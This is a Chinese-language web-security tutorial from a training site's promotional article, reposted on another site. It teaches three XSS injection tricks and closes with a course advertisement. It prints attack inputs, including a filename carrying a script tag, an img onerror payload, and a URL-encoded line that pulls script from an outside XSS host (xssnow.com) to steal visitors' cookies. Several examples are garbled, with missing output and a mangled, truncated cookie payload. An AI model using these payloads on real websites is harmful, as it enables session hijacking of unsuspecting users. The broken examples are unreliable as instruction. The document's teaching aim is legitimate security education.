【Web安全入門】三個技巧教你玩轉XSS漏洞


 

XSS漏洞是Web應用程序中最常見的漏洞之一,想要入門Web安全的小伙伴,這個知識點是必學的。

i春秋官網中有很多關於XSS漏洞的課程,新手小白可以去官網看課學習。

學習地址:https://www.ichunqiu.com/search/XSS漏洞

 

XSS是一種經常出現在Web應用中的計算機安全漏洞,也是客戶端腳本安全的頭號大敵。今天i春秋跟大家分享的是XSS漏洞的進階篇,如何利用XSS漏洞的一些小技巧,希望對大家學習Web安全有所幫助。

污染標簽

簡單的說,XSS漏洞的本質就是輸入與輸出。

比如,我的QQ網名是:

"你的網名">

結果就被污染成

<input value="">

 

這樣的話我就成功彈窗了,但又有什么用呢?

我們可以構造語句:

<input value=""#ff0000">http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));">

這樣我們就能成功打到cookie了。

 

 

文件名稱XSS

有些網站有上傳點,但是后台並未對文件名做更改。

比如上傳以后前端代碼是這樣的:

<a href="http://127.0.0.1/upload/1.rar">test</a>

1.rar假設就是我們上傳的文件。

 

我們是不是又可以構造語句閉合或者污染標簽,值得一提的是,你需要抓包改文件名(想在Windows環境下改,你去試試就知道是怎么回事了)

我們就改成:

"><script>alert(1)</script>.rar

這樣的話,就變成:

 

 

成功彈窗,如果過濾了尖括號 < >

就可以按照之前講的標簽污染法,讓它執行我們的JS語句。

閉合JS

有時候,JS會調用我們網站的一些資料,類似昵稱。

<html>

<head>

<script>

name = sqler;

</script>

</head>

<body>

welcome sqler;

</body>

</html>

因為我們昵稱是被包含在<head>里,我們無法利用。

這樣我們就需要為它打開一個新大門。

</script></head><body><img src=x onerror=alert(1)>

 

這樣我們就成功彈窗。

以上就是今天要分享的內容,是不是很簡單。

XSS漏洞是Web安全入門必掌握的知識點,當然還有CSRF漏洞、Webshell與文件上傳漏洞、SQL注入等等,如果想要全面系統的學習Web安全入門課程,可以到i春秋官網(ichunqiu.com/train)進行報名。

 

快速報名入口:https://www.ichunqiu.com/train/course/11

面向人群

信息安全小白、高等院校信息安全、網絡空間安全專業學生、信息安全愛好者、Web應用開發人員。

學習方式

通過在線視頻學習資源,結合實驗練習,帶你全方位學習Web安全。上課期間助教老師實時在互動區進行溝通答疑,若脫離上課時間可在班級內老師答疑模塊中進行問題咨詢留言。

學習時間

Web安全入門班每月有兩次報名機會,大家可以根據自己實際情況進行相應選擇,學習時間靈活,非常適合上班族的新手小白們。

課程目標

1、了解Web應用程序架構;

2、熟悉Web常見漏洞原理;

3、掌握Web基礎安全漏洞利用方式與防御方法;

4、熟悉滲透測試流程;

5、熟練使用多種滲透測試工具。

課程介紹

課程以漏洞為核心,從Web應用架構、漏洞原理,利用方式與防御方法等,多方面剖析Web應用安全相關知識,並以此為基礎學習滲透測試的操作流程及各階段工作內容,熟悉滲透測試工具的使用。

課程優勢

1、低門檻、易學習;

2、知識點配套實驗;

3、助教老師答疑。

通過以上內容的介紹,如果還有其他疑問,歡迎大家前來咨詢,我們會有更專業的老師為你講解,給你答疑解惑。謝老師 18513200565(手機、微信同步)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM